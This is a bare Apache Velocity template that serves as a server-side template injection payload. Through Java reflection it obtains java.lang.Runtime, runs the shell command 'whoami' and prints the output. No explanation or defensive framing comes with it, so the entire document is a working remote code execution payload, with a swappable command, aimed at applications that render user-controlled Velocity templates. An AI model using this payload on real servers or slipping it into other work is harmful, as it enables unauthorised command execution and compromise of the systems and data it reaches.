#set ($exp="exp")
#set ($str=$exp.getClass().forName("java.lang.String"))
#set ($chr=$exp.getClass().forName("java.lang.Character"))
#set ($a=$exp.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("whoami"))
#set ($out=$a.getInputStream())

#foreach ($i in [0..100000])
    #set ($line = false)
    #set ($line = $out.readLine())
    #if ($line)
        ${line}
    #else
        #break
    #end
#end
